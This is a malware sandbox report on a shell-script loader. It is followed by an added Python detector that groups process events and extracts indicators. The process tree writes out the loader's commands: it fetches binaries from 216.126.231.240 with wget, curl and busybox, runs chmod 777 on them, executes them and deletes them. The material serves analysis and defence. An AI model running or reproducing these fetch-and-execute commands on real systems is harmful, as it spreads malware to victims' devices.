Analysis

max time kernel: 135s
max time network: 138s
platform: debian-9_mipsel
resource: debian9-mipsel-20240611-en
resource tags: arch:mipsel, image:debian9-mipsel-20240611-en, kernel:4.9.0-13-4kc-malta, locale:en-us, os:debian-9-mipsel, system
submitted: 14-11-2024 02:53

Static task: static1
Behavioral task: behavioral1
  Sample: a6080262ea0c440b8e0f3f1799a1d992f83c1f7861993c1edb4185211acbc3ff.sh
  Resource: ubuntu1804-amd64-20240508-en
Behavioral task: behavioral2
  Sample: a6080262ea0c440b8e0f3f1799a1d992f83c1f7861993c1edb4185211acbc3ff.sh
  Resource: debian9-armhf-20240611-en
Behavioral task: behavioral3
  Sample: a6080262ea0c440b8e0f3f1799a1d992f83c1f7861993c1edb4185211acbc3ff.sh
  Resource: debian9-mipsbe-20240729-en
Behavioral task: behavioral4
  Sample: a6080262ea0c440b8e0f3f1799a1d992f83c1f7861993c1edb4185211acbc3ff.sh
  Resource: debian9-mipsel-20240611-en

General

Target: a6080262ea0c440b8e0f3f1799a1d992f83c1f7861993c1edb4185211acbc3ff.sh
Size: 10KB
MD5: 920017685299c34fe40ed0d31390a654
SHA1: 15be0738ab44434517b3a1bb41d0ba9752f0da28
SHA256: a6080262ea0c440b8e0f3f1799a1d992f83c1f7861993c1edb4185211acbc3ff
SHA512: 345ccb820bce7b8dfc3acfa03f31c9b6f78085244b384f3120613434fc0e99ba7ff0dd572b530fb2ed261d9b8216390818d7773df018ccdd230cee2fa8b4a6a4
SSDEEP: 192:wueun7kYb/vUMNghVWlhZHWaW2lVlwc4ueun7wb/vUMM8lVlwcKhZHWaP:wueun7kYb/vUMNghV92lVlwc4ueun7w4
Malware Config
Signatures

File and Directory Permissions Modification  (1 TTPs, 28 IoCs)
Adversaries may modify file or directory permissions to evade defenses.
Processes: chmod, 28 instances (PIDs 732, 738, 752, 778, 801, 810, 827, 852, 858, 864, 870, 876, 882, 888, 894, 900, 906, 912, 918, 924, 930, 936, 942, 948, 954, 960, 966, 972)

Executes dropped EXE  (28 IoCs)
Processes (ioc = executed image):
  PID  Image
  733  /tmp/49irlYlhW1pQmwlDaVrLaKzYecToHyUObH
  739  /tmp/qHCs9tlmlN5waXGL6N7vD1TKNE2fMAKQTy
  754  /tmp/V565oMREGt3pi5uNXK6zgs7WwRfUAkq9Pz
  779  /tmp/5KGRoi6CG47lqx1xe9GeG7BrJLflLTQzm4
  802  /tmp/2i7eUZodswPOZ3YHkvfHkejyH5tSnDy932
  811  /tmp/lZF8LM8bTjcsKdc3ngN6DWZxo6IXSLmJWD
  829  /tmp/7oLEIWeAcEm3zmyGwH9aybrya5jGaPsAOP
  853  /tmp/dvK4BafVbBSUJi1hDpPTFoUEfrRHVic6cw
  859  /tmp/gZeyZnrbbOM2HwEOfAPqOHTPWW8ESaG5gs
  865  /tmp/1BSmB9KGuK6znFf5VBDep3VxMqq2wef23z
  871  /tmp/S1yQbJJqsxutFfMd773H9H8eSVOHhHs3db
  877  /tmp/IzUor4CncpgQBrMSVS6lA6UObBDbUtCYRq
  883  /tmp/ysc6biA4IgoxzZzjEFUn82WVsduROTl3DQ
  889  /tmp/xBYmhoIPx6iFtPaabqE8Vx4eSbzj0n8dzt
  895  /tmp/49irlYlhW1pQmwlDaVrLaKzYecToHyUObH
  901  /tmp/lZF8LM8bTjcsKdc3ngN6DWZxo6IXSLmJWD
  907  /tmp/7oLEIWeAcEm3zmyGwH9aybrya5jGaPsAOP
  913  /tmp/dvK4BafVbBSUJi1hDpPTFoUEfrRHVic6cw
  919  /tmp/qHCs9tlmlN5waXGL6N7vD1TKNE2fMAKQTy
  925  /tmp/V565oMREGt3pi5uNXK6zgs7WwRfUAkq9Pz
  931  /tmp/5KGRoi6CG47lqx1xe9GeG7BrJLflLTQzm4
  937  /tmp/2i7eUZodswPOZ3YHkvfHkejyH5tSnDy932
  943  /tmp/gZeyZnrbbOM2HwEOfAPqOHTPWW8ESaG5gs
  949  /tmp/1BSmB9KGuK6znFf5VBDep3VxMqq2wef23z
  955  /tmp/xBYmhoIPx6iFtPaabqE8Vx4eSbzj0n8dzt
  961  /tmp/S1yQbJJqsxutFfMd773H9H8eSVOHhHs3db
  967  /tmp/IzUor4CncpgQBrMSVS6lA6UObBDbUtCYRq
  973  /tmp/ysc6biA4IgoxzZzjEFUn82WVsduROTl3DQ

Reads runtime system information  (28 IoCs)
Processes: curl, 28 instances; each opened /proc/sys/crypto/fips_enabled for reading (one IoC per curl run).

System Network Configuration Discovery  (1 TTPs, 10 IoCs)
Adversaries may gather information about the network configuration of a system.
Processes:
  PID  Process
  885  wget
  886  curl
  887  busybox
  889  xBYmhoIPx6iFtPaabqE8Vx4eSbzj0n8dzt
  890  rm
  951  wget
  952  curl
  953  busybox
  955  xBYmhoIPx6iFtPaabqE8Vx4eSbzj0n8dzt
  956  rm

Writes file to tmp directory  (28 IoCs)
Malware often drops required files in the /tmp directory.
Processes: curl, 28 instances; each opened its download target for modification. The 14 paths, each written twice (once per fetch pass):
  /tmp/49irlYlhW1pQmwlDaVrLaKzYecToHyUObH
  /tmp/qHCs9tlmlN5waXGL6N7vD1TKNE2fMAKQTy
  /tmp/V565oMREGt3pi5uNXK6zgs7WwRfUAkq9Pz
  /tmp/5KGRoi6CG47lqx1xe9GeG7BrJLflLTQzm4
  /tmp/2i7eUZodswPOZ3YHkvfHkejyH5tSnDy932
  /tmp/lZF8LM8bTjcsKdc3ngN6DWZxo6IXSLmJWD
  /tmp/7oLEIWeAcEm3zmyGwH9aybrya5jGaPsAOP
  /tmp/dvK4BafVbBSUJi1hDpPTFoUEfrRHVic6cw
  /tmp/gZeyZnrbbOM2HwEOfAPqOHTPWW8ESaG5gs
  /tmp/1BSmB9KGuK6znFf5VBDep3VxMqq2wef23z
  /tmp/S1yQbJJqsxutFfMd773H9H8eSVOHhHs3db
  /tmp/IzUor4CncpgQBrMSVS6lA6UObBDbUtCYRq
  /tmp/ysc6biA4IgoxzZzjEFUn82WVsduROTl3DQ
  /tmp/xBYmhoIPx6iFtPaabqE8Vx4eSbzj0n8dzt
Processes

All activity runs under one parent, the submitted script; every other process is its direct child (level 2 in the original tree):

  PID 702  /tmp/a6080262ea0c440b8e0f3f1799a1d992f83c1f7861993c1edb4185211acbc3ff.sh
  PID 709  /bin/rm        rm bins.sh

Each payload is then handled by the same six-step sequence, run from /tmp. The signature tags the sandbox attached to each step are in brackets:

  /usr/bin/wget   wget http://216.126.231.240/bins/<name>
  /usr/bin/curl   curl -O http://216.126.231.240/bins/<name>            [Reads runtime system information; Writes file to tmp directory]
  /bin/busybox    /bin/busybox wget http://216.126.231.240/bins/<name>
  /bin/chmod      chmod 777 <name>                                      [File and Directory Permissions Modification]
  /tmp/<name>     ./<name>                                              [Executes dropped EXE]
  /bin/rm         rm <name>

The sequence ran 28 times, covering each of the 14 names twice. PIDs per step, in execution order:

  #   name                                wget  curl  busybox  chmod  exec  rm
  1   49irlYlhW1pQmwlDaVrLaKzYecToHyUObH  711   723   730      732    733   734
  2   qHCs9tlmlN5waXGL6N7vD1TKNE2fMAKQTy  735   736   737      738    739   740
  3   V565oMREGt3pi5uNXK6zgs7WwRfUAkq9Pz  741   742   747      752    754   756
  4   5KGRoi6CG47lqx1xe9GeG7BrJLflLTQzm4  758   766   773      778    779   784
  5   2i7eUZodswPOZ3YHkvfHkejyH5tSnDy932  785   794   799      801    802   803
  6   lZF8LM8bTjcsKdc3ngN6DWZxo6IXSLmJWD  804   805   809      810    811   812
  7   7oLEIWeAcEm3zmyGwH9aybrya5jGaPsAOP  813   814   823      827    829   830
  8   dvK4BafVbBSUJi1hDpPTFoUEfrRHVic6cw  833   847   851      852    853   854
  9   gZeyZnrbbOM2HwEOfAPqOHTPWW8ESaG5gs  855   856   857      858    859   860
  10  1BSmB9KGuK6znFf5VBDep3VxMqq2wef23z  861   862   863      864    865   866
  11  S1yQbJJqsxutFfMd773H9H8eSVOHhHs3db  867   868   869      870    871   872
  12  IzUor4CncpgQBrMSVS6lA6UObBDbUtCYRq  873   874   875      876    877   878
  13  ysc6biA4IgoxzZzjEFUn82WVsduROTl3DQ  879   880   881      882    883   884
  14  xBYmhoIPx6iFtPaabqE8Vx4eSbzj0n8dzt  885   886   887      888    889   890  *
  15  49irlYlhW1pQmwlDaVrLaKzYecToHyUObH  891   892   893      894    895   896
  16  lZF8LM8bTjcsKdc3ngN6DWZxo6IXSLmJWD  897   898   899      900    901   902
  17  7oLEIWeAcEm3zmyGwH9aybrya5jGaPsAOP  903   904   905      906    907   908
  18  dvK4BafVbBSUJi1hDpPTFoUEfrRHVic6cw  909   910   911      912    913   914
  19  qHCs9tlmlN5waXGL6N7vD1TKNE2fMAKQTy  915   916   917      918    919   920
  20  V565oMREGt3pi5uNXK6zgs7WwRfUAkq9Pz  921   922   923      924    925   926
  21  5KGRoi6CG47lqx1xe9GeG7BrJLflLTQzm4  927   928   929      930    931   932
  22  2i7eUZodswPOZ3YHkvfHkejyH5tSnDy932  933   934   935      936    937   938
  23  gZeyZnrbbOM2HwEOfAPqOHTPWW8ESaG5gs  939   940   941      942    943   944
  24  1BSmB9KGuK6znFf5VBDep3VxMqq2wef23z  945   946   947      948    949   950
  25  xBYmhoIPx6iFtPaabqE8Vx4eSbzj0n8dzt  951   952   953      954    955   956  *
  26  S1yQbJJqsxutFfMd773H9H8eSVOHhHs3db  957   958   959      960    961   962
  27  IzUor4CncpgQBrMSVS6lA6UObBDbUtCYRq  963   964   965      966    967   968
  28  ysc6biA4IgoxzZzjEFUn82WVsduROTl3DQ  969   970   971      972    973   974

  * In rounds 14 and 25 the wget, curl, busybox, exec and rm processes (but not chmod) additionally carry the System Network Configuration Discovery tag.
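Added example (not part of the sandbox report and not the loader's own code): a small Python detector that takes process events shaped like the tree above, groups a parent's children into fetch, chmod, execute and delete rounds, and pulls out the indicators a responder would block. The event list is constructed from the report (the first two rounds, the first xBYmhoIPx6iFtPaabqE8Vx4eSbzj0n8dzt round, and the second-pass re-fetch of 49irlYlhW1pQmwlDaVrLaKzYecToHyUObH); the regexes, the Proc and Round types and the function names are this example's own assumptions, not anything the report defines.

```python
import re
from dataclasses import dataclass, field
from typing import List, Optional
from urllib.parse import urlparse

@dataclass
class Proc:
    pid: int
    ppid: int
    image: str      # executable path; for "./name" run from /tmp this is /tmp/name
    cmdline: str

@dataclass
class Round:
    """One payload: fetched into the loader's cwd (/tmp), chmod'ed, run, deleted."""
    name: str
    urls: List[str] = field(default_factory=list)
    fetch_pids: List[int] = field(default_factory=list)
    chmod_pid: Optional[int] = None
    exec_pid: Optional[int] = None
    rm_pid: Optional[int] = None

    def complete(self) -> bool:
        return bool(self.fetch_pids) and None not in (self.chmod_pid, self.exec_pid, self.rm_pid)

BASE = "http://216.126.231.240/bins/"
LOADER = "/tmp/a6080262ea0c440b8e0f3f1799a1d992f83c1f7861993c1edb4185211acbc3ff.sh"

def _round(name, pids):
    """Constructed sample: the six children the report shows per payload, in order."""
    url = BASE + name
    return [
        Proc(pids[0], 702, "/usr/bin/wget", f"wget {url}"),
        Proc(pids[1], 702, "/usr/bin/curl", f"curl -O {url}"),
        Proc(pids[2], 702, "/bin/busybox", f"/bin/busybox wget {url}"),
        Proc(pids[3], 702, "/bin/chmod", f"chmod 777 {name}"),
        Proc(pids[4], 702, f"/tmp/{name}", f"./{name}"),
        Proc(pids[5], 702, "/bin/rm", f"rm {name}"),
    ]

# Constructed from the sandbox process tree (parent PID 702); not a log the report provides.
SAMPLE = [
    Proc(702, 1, LOADER, LOADER),
    Proc(709, 702, "/bin/rm", "rm bins.sh"),   # self-delete under the script's original name
    *_round("49irlYlhW1pQmwlDaVrLaKzYecToHyUObH", (711, 723, 730, 732, 733, 734)),
    *_round("qHCs9tlmlN5waXGL6N7vD1TKNE2fMAKQTy", (735, 736, 737, 738, 739, 740)),
    *_round("xBYmhoIPx6iFtPaabqE8Vx4eSbzj0n8dzt", (885, 886, 887, 888, 889, 890)),
    *_round("49irlYlhW1pQmwlDaVrLaKzYecToHyUObH", (891, 892, 893, 894, 895, 896)),  # 2nd pass
]

FETCH_RE = re.compile(r"(?:^|\s)(?:wget|curl)\s.*?(https?://\S+)")  # direct or via busybox
CHMOD_RE = re.compile(r"^chmod\s+([0-7]{3,4}|\+x)\s+(\S+)$")
RM_RE = re.compile(r"^rm\s+(?:-\S+\s+)*(\S+)$")

def find_rounds(procs, parent_pid):
    """Walk one parent's children in PID order and pair each fetched file name with the
    chmod, execution and deletion that follow. A new fetch of a name whose round is
    already complete opens a new round, so re-fetches are counted separately."""
    rounds, open_rounds = [], {}
    for p in sorted((q for q in procs if q.ppid == parent_pid), key=lambda q: q.pid):
        if m := FETCH_RE.search(p.cmdline):
            url = m.group(1)
            name = urlparse(url).path.rsplit("/", 1)[-1]
            r = open_rounds.get(name)
            if r is None or r.complete():
                r = open_rounds[name] = Round(name)
                rounds.append(r)
            r.urls.append(url)
            r.fetch_pids.append(p.pid)
        elif m := CHMOD_RE.match(p.cmdline):
            mode, name = m.groups()
            if name in open_rounds and (mode == "+x" or int(mode, 8) & 0o111):
                open_rounds[name].chmod_pid = p.pid
        elif p.cmdline.startswith("./") and p.image.startswith("/tmp/"):
            if (name := p.cmdline[2:]) in open_rounds:
                open_rounds[name].exec_pid = p.pid
        elif (m := RM_RE.match(p.cmdline)) and m.group(1) in open_rounds:
            open_rounds[m.group(1)].rm_pid = p.pid
    return rounds

def extract_iocs(rounds):
    """Indicators to block or hunt for: download hosts, URLs, dropped paths, PIDs that ran."""
    return {
        "hosts": sorted({urlparse(u).netloc for r in rounds for u in r.urls}),
        "urls": sorted({u for r in rounds for u in r.urls}),
        "dropped_paths": sorted({f"/tmp/{r.name}" for r in rounds}),
        "executed_pids": [r.exec_pid for r in rounds if r.exec_pid is not None],
    }

if __name__ == "__main__":
    found = find_rounds(SAMPLE, 702)
    print(len(found), "rounds;", sum(r.complete() for r in found), "complete;", extract_iocs(found))
```

Running it reports four rounds, all complete, and a single download host, 216.126.231.240. Two details of this loader are worth carrying into detection logic: it tries wget, then curl -O, then busybox wget for every file, so a rule keyed on one downloader will miss devices where only busybox exists; and each binary is removed immediately after it is started, so the dropped file is gone before any on-disk scan runs, although /proc/<pid>/exe of the still-running process continues to name it. The script's own self-delete, rm bins.sh, targets its original filename, which is not the name under which the sample was submitted here.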
Network
MITRE ATT&CK Enterprise v15
Downloads

Filesize: 153B
MD5: 998368d7c95ea4293237f2320546e440
SHA1: 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256: 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512: 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97